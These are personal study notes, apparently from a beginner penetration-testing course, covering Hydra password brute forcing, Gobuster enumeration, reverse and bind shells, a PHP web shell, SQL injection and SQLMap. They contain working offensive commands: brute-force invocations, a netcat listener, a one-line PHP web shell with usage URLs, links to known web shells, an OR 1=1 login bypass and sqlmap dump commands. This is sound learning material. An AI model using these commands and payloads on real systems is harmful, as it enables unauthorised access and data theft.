---
sr-due: 2025-03-28
sr-interval: 11
sr-ease: 190
---

#review 
# Hydra

## Hydra Introduction

Hydra is a brute force online password cracking program. Hydra can run through a "brute force" some authentication services 
## Using Hydra 

The options that we pass into hydra depend on what service (protocol) we're attacking. For example, if we wanted to brute force FTP with the username being <mark style="background: #D2B3FFA6;">user</mark> and a passwords list being passlist.txt, we'd use the following command

<span style="color:rgb(255, 192, 0)">hydra</span> <span style="color:rgb(0, 176, 240)">-l</span> <span style="color:rgb(255, 192, 0)">user</span> <span style="color:rgb(0, 176, 240)">-P</span> passlist.txt ftp://10.10.245.6

| Option | Description                            |
| ------ | -------------------------------------- |
| -l     | specifies the (SSH) username for login |
| -P     | indicates a list of passwords          |
| -t     | sets the number of threads to spawn    |

<span style="color:rgb(255, 192, 0)">hydra</span> <span style="color:rgb(0, 176, 240)">-l</span> <span style="color:rgb(255, 192, 0)">root</span> <span style="color:rgb(0, 176, 240)">-P</span> passwords.txt 10.10.9.229 -t 4 ssh
- Hydra will use <mark style="background: #D2B3FFA6;">root</mark> as the username for <mark style="background: #D2B3FFA6;">ssh</mark>
- It will try the passwords in the <mark style="background: #D2B3FFA6;">passwords.txt</mark> file
- There will be four threads running in parallel as indicated by <mark style="background: #D2B3FFA6;">-t 4</mark>

#### Post Web Form

We can use Hydra to brute force web forms too. <span style="color:rgb(255, 0, 0)">You must know which type of request it is making</span>; GET or POST methods are commonly used. You can use your browser’s network tab (in developer tools) to see the request types or view the source code.

| Option                                         | Description                                                                                                                        |
| ---------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| <span style="color:rgb(0, 176, 240)">-l</span> | the username for (web form) login                                                                                                  |
| <span style="color:rgb(0, 176, 240)">-P</span> | the password list to use                                                                                                           |
| {http-post-form}                               | the type of the form is POST                                                                                                       |
| {path}                                         | the login page URL, for example, <mark style="background: #D2B3FFA6;">login.php</mark>                                             |
| {login_credentials}                            | the username and password used to log in, for example, <mark style="background: #D2B3FFA6;">username=^USER^&password=^PASS^</mark> |
| {invalid_response}                             | part of the response when the login fails                                                                                          |
| <span style="color:rgb(0, 176, 240)">-V</span> | verbose output for every attempt                                                                                                   |

```
hydra -l <username> -P <wordlist> 10.10.9.229 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```

- The login page is only /, i.e., the main IP address.
- The username is the form field where the username is entered
- The specified username(s) will replace ^USER^
- The password is the form field where the password is entered
- The provided passwords will be replacing ^PASS^
- Finally, F=incorrect is a string that appears in the server reply when the login fails

# Gobuster: The Basics

## Gobuster Introduction

Gobuster enumerates web directories, DNS subdomains, vhosts, Amazon S3 buckets, and Google Cloud Storage by brute force, using specific wordlists. 

Enumeration ;; is the act of listing all available resources, whether they are accessible or not

Brute Force is the act of trying every possibility until a match is found

| Flag                                           | Long Flag  | Description                                                                                                                                                                                                                                                                         |
| ---------------------------------------------- | ---------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| <span style="color:rgb(0, 176, 240)">-t</span> | --threads  | This flag configures the number of threads to use for the sca.                                                                                                                                                                                                                      |
| <span style="color:rgb(0, 176, 240)">-w</span> | --wordlist | Path to wordist                                                                                                                                                                                                                                                                     |
|                                                | --delay    | amount of time to wait between sending requests. Some web servers include mechanisms to detect enumeration by looking at how many requests are received in a certain period of time. We can increase the delay between subsequent requests to make it look like normal web traffic. |
|                                                | --debug    | troubleshoot when our command gives unexpected errors.                                                                                                                                                                                                                              |
| <span style="color:rgb(0, 176, 240)">-o</span> | --output   | Output file to write results to                                                                                                                                                                                                                                                     |
<span style="color:rgb(255, 0, 0)">Ex</span>: 
```
gobuster dir -u "http://www.example.thm/" -w /usr/share/wordlists/dirb/small.txt -t 64
```


## Use Case: Directory and File Enumeration

Gobuster has a <mark style="background: #D2B3FFA6;">dir</mark> mode that allows users to enumerate website directories and their files. This is most useful when performing a pentest and would like to see what the directory structure of a website is and what files it contains

Gobuster is powerful because it tells you the stats codes of the website which immediately tell you if you, as an outsider, can request that directory or not

<mark style="background: #D2B3FFA6;">gobuster dir --help
</mark>

```
gobuster dir -u "http://www.example.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r
```

- <mark style="background: #D2B3FFA6;">gobuster dir</mark> configures gobuster to use directory and file enumeration mode
- <mark style="background: #D2B3FFA6;">-u http://www.example.thm</mark>
	- Explains where Gobuster starts looking
	- The URL must contain the protocol used. This is important and required.
	- In the host part of the URL, you can fill in a host name or an IP. However, you may get a different website than you intend using IP because a webserver can host multiple websites using onw IP (virtual hosting). Use hostname if  you want to be sure
	- Gobuster does not enumerate recursively, so if you are interested in a directory path, you will have to enumerate that specific directory
- <mark style="background: #D2B3FFA6;">-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</mark> configures Gobuster to use the *directory-list-2.3-medium.txt* wordlist to enumerate
- <mark style="background: #D2B3FFA6;">-r </mark>configures Gobuster to follow the redirect responses received from the sent request


## Use Case: Subdomain Enumeration

<mark style="background: #D2B3FFA6;">dns</mark> mode allows use to brute force subdomains. During a pentest, checking the subdomain is important. Just because something is patched in the regular domain doesn't mean it is also patched in the subdomain.


<mark style="background: #D2B3FFA6;">gobuster dns --help</mark>


```
gobuster dns -d example.thm -w /path/to/wordlist
```

## Use Case: Vhost Enumeration

vhost allows gobuster to brute force virtual hosts. Virtual hosts are different websites on the same machine. Sometimes they look like subdomains. Virtual hosts are IP-based and running on the same server. Subdomains are set up in DNS. 

```
gobuster vhost -u "http://10.10.125.193" --domain example.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain --exclude-length 250-320
```

*www.example.thm*

<mark style="background: #D2B3FFA6;">www</mark>  This is the subdomain. This is the part that Gobuster will fill in with each entry of the configured wordlist.



- <mark style="background: #D2B3FFA6;">gobuster vhost</mark> instructs Gobuster to enumerate virtual hosts.
- <mark style="background: #D2B3FFA6;">-u "http://10.10.125.193" </mark>sets the URL to browse to 10.10.125.193.
- <mark style="background: #D2B3FFA6;">-w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt</mark> configures Gobuster to use the *subdomains-top1million-5000.txt wordlist*
- <mark style="background: #D2B3FFA6;">-domain example.thm</mark> sets the top- and second-level domains
- <mark style="background: #D2B3FFA6;">--append-domain</mark> appends the configured domain to each entry in the wordlist. If this flag is not configured, the set hostname would be www, blog, etc. This will cause the command to work incorrectly and display false positives.
- <mark style="background: #D2B3FFA6;">--exclude-length</mark> filters the responses we get from the sent web requests. With this flag, we can filter out the false positives. These false positives typically have a similar response size, so we can use this to filter out most false positives.

# Shells Overview

Shells are commonly used in cybersecurity to remotely control systems. 

## Shell Overview

A shell is a software that allows us to interact with an OS. In cybersecurity, it is common to refer to a specific shell session an attacker uses when accessing a compromised system. This will allow attacker to execute several different activities such as:

- Remote System Control
- Privilege Escalation
- Data Exfiltration
- Persistence and Maintaining Access
- Post Exploitation Activities
- Access Other System on the Network

## Reverse Shell

Also referred to as a connect back shell is one of the most popular techniques for gaining access to a system in a cyber attack. The connections initiate from the target system to the attacker's machine which helps avoid detection from security appliances.

### How Reverse Shells Work

**Set up a Netcat (nc) Listener**

```
nc -lvnp 443
```

<span style="color:rgb(255, 192, 0)">-l</span> listen
<span style="color:rgb(255, 192, 0)">-v</span> verbose
<span style="color:rgb(255, 192, 0)">-n</span> does not resolve DNS name
<span style="color:rgb(255, 192, 0)">-p</span> port

**Gaining Reverse Shell Access**

Once listener is set up, the attacker will then execute a reverse shell payload. This payload usually abuses the vulnerability or unauthorized access granted by the attacker and executes a command that will expose the shell through the network.

**Attacker Receives the Shell**

Once the above payload is executed, the attacker will receive a reverse shell, as shown below, allowing them to execute commands as if they were logging into a regular terminal in the OS.

## Bind Shell

Binds is;; a port on the compromised system and listen for a connection. When the connection occurs it exposes the shell session so the attacker can execute commands remotely.

This method can be used when outbound connections are not allowed but is less popular than reverse shell because it needs to remain active and listen for detections which can lead to detection

### How Bind Shells Work

**Set Up the Bind Shell on the Target**

Create a bind shell payload. Ports below 1024 need to be executed with elevated privileges so use a port higher than that. 

**Attacker Connects to the Bind Shell**

```
nc -nv TARGET_IP 8080
```

## Shell Listeners

- **Rlwrap** a small utility that uses the GNU readline library to provide editing keyboard and history.
- **Ncat**  is an improved version of Netcat distributed by the NMAP project. It provides extra features, like encryption (SSL).
- **Socat** allows you to create a socket connection between two data sources, in this case, two different hosts.
	- A socket connection is a software endpoint that enables two programs on a network to communicate, acting as a virtual "doorway" for data exchange



## Shell Payloads

A Shell Payload can be a command or script that exposes the shell to an incoming connection in the case of a bind shell or a send connection in the case of a reverse shell.

## Web Shell

A web shell is a script written in a language supported by a compromised web server that executes commands through the web server itself. A web shell is usually a file containing the code that executes commands and handles files. It can be hidden within a compromised web application or service, making it difficult to detect and very popular among attackers.

### Example PHP Web Shell


```php
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
```


The shell can be saved into a file with the PHP extension, like shell.php, and then uploaded into the web server by the attacker by exploiting vulnerabilities such as **Unrestricted File Upload, File Inclusion, Command Injection**, among others, or by gaining unauthorized access to it. 

After the web shell is deployed in the server, it can be accessed through the URL where the web shell is hosted, in this example http://victim.com/uploads/shell.php. As we observed from the code in shell.php, we need to provide a GET method and the value of the variable cmd, which should contain the command the attacker wants to execute. For example, if we want to execute the command whoami the request to the URL should be:
http://victim.com/uploads/shell.php?cmd=whoami

### Existing Web Shells Available Online

[p0wny-shell](https://github.com/flozz/p0wny-shell) - A minimalistic single-file PHP web shell that allows remote command execution
[b374k shell](https://github.com/b374k/b374k) - A more feature-rich PHP web shell with file management and command execution, among other functionalities
[c99 shell](https://www.r57shell.net/single.php?id=13) - A well-known and robust PHP web shell with extensive functionality
You can find more web shells at: [https://www.r57shell.net/index.php](https://www.r57shell.net/index.php).


http://10.10.142.153:8082/uploads/shell.php?cmd=whoami

# SQLMap: The Basics

A database is a collection of data that can be stored, modified, and retrieved. It stores data from several applications in a structured format, making storage, modification, and retrieval easy and efficient. Websites have databases that store the users information. So when you enter your credentials to a websites login page, the website interacts with the database to see if these credentials are correct. The databases are managed by Database Management Systems (DBMS), such as MySQL, PostgreSQL, SQLite, or Microsoft SQL Server.

Let’s assume the website login page we discussed above lacks input validation and sanitization. This means that it is vulnerable to SQL injection. The attacker does not know the password of the user John. They will type the following input in the given fields:

``` mysql
SELECT * FROM users WHERE username = 'John' AND password = 'abc' OR 1=1;-- -';
```

This query will check if there is a user John, and then check if he has the password abc. Ideally, the query should fail here because it expects both username and password to be correct, as the <mark style="background: #D2B3FFA6;">AND</mark> operator is between them. This query, however, has another condition <mark style="background: #D2B3FFA6;">OR 1=1</mark>.  Any one of them being true will make the whole SQL query successful. The password failed, so the query will check the next condition, which checks if 1=1. As we know, 1=1 is always true, so it will ignore the random password entered before this and consider this statement as true, which will successfully execute this query. The<mark style="background: #D2B3FFA6;"> -- - </mark>at the end of the query would comment anything after 1=1, which means the query would be successfully executed, and the attacker would get logged in to John’s user account.

One of the important things to note here is the use of a single quote <mark style="background: #D2B3FFA6;">'</mark> after <mark style="background: #D2B3FFA6;">abc</mark>. Without this single quote,' the whole string <mark style="background: #D2B3FFA6;">'abc OR 1=1;-- -'</mark> would be considered the password, which is not intended. However, if we add a single quote ' after abc, the password would look like 'abc' OR 1=1;---', which encloses the original string abc in the query and allows us to introduce a logical condition<mark style="background: #D2B3FFA6;"> OR 1=1</mark>, which is always true.

## Automated SQL Injection Tool

SQLMap is an automated tool for detecting and exploiting SQL injection vulnerabilities in wen applications. It simplifies the process of identifying these vulnerabilities. 

- The <span style="color:rgb(255, 192, 0)">--wizard</span> flag with SQLMap will guide you through each step and ask questions to complete the scan
 - <span style="color:rgb(255, 192, 0)">--dbs</span> flag helps extract all the database names. Once you get to know the database names, 
- <span style="color:rgb(255, 192, 0)">-D</span> \<database_name><span style="color:rgb(255, 192, 0)"> --tables</span>  can extract information about the tables of that database 
- <span style="color:rgb(255, 192, 0)">-D</span> \<database_name><span style="color:rgb(255, 192, 0)"> -T</span> \<table name> <span style="color:rgb(255, 192, 0)">--dump</span> - enumerate the records in those tables


If you see any web application using GET parameters in the URLs to retrieve data, you can test that URL with the <span style="color:rgb(255, 192, 0)">-u</span> flag in the SQLMap tool. This is considered to be HTTP GET-based testing. This approach is followed when the application uses GET parameters in the URL to retrieve data from the searches. http://sqlmaptesting.thm/search?cat=1 would be a get request. The GET parameter is cat=1

```
sqlmap -u http://sqlmaptesting.thmsearch/cat=1 -D users -T thomas --dump
```


You can also use POST-based testing, where the application sends data in the request's body instead of the URL. Examples of this could be login forms, registration forms, etc. To follow this approach, you must intercept a POST request on the login or registration page and save it as a text file. You can use the following command to input that request saved in the text file to the SQLMap tool

```
sqlmap -r intercepted_request.txt
```

## Practical Exercise

Sometimes the GET request doesn't show.  To get the complete URL along with its GET parameters, we need to right-click on the login page and click the inspect option (the process may vary slightly from browser to browser). From here, we have to select the Network tab; then we have to enter some test credentials in the username and password fields and click the login button, and we will be able to see the GET request.

